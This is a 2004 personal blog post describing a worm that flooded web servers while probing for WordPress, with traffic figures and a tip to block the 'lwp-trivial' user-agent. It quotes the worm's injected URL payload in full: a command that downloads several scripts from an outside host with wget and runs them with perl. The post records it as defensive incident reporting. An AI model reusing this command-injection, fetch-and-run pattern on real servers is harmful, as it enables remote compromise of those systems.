Saturday, December 25, 2004

Flood

There is a worm that targets Wordpress that is flooding servers. It refers to www.visualcoders.net and tries to run perl scripts. I noticed a huge increase in traffic today, and in an attempt to stem the flow, did a bit of searching. http://wordpress.org/support/7/19285 gives some tips.

The key is to stop the first probe that has a user-agent of "lwp-trivial". On my site it would grab one of the links and then attack it. If the first probe is stopped however, the worm quits.

There was one hit on the 3rd, 11th and 17th of December, then just before 9AM PST the flood started. 303 different servers did 25,569 hits with the worm. The worm changes the &version and appends a &cmd to the url found in the page it gets from the first probe. Here is the added portion of the url, with linebreaks for readability: "&version=http://www.visualcoders.net/spy.gif? &cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt; wget%20www.visualcoders.net/worm1.txt; wget%20www.visualcoders.net/php.txt; wget%20www.visualcoders.net/ownz.txt; wget%20www.visualcoders.net/zone.txt; perl%20spybot.txt;perl%20worm1.txt; perl%20ownz.txt; perl%20php.txt"

The Wordpress support seemed to indicate that the worm checked whether Wordpress was running before initiating the attack. I don't run Wordpress, so it doesn't seem to matter. In other words most web servers will be generously donating bandwidth for nothing.


Comments: Post a Comment

Subscribe to Post Comments [Atom]





<< Home

This page is powered by Blogger. Isn't yours?

Subscribe to Posts [Atom]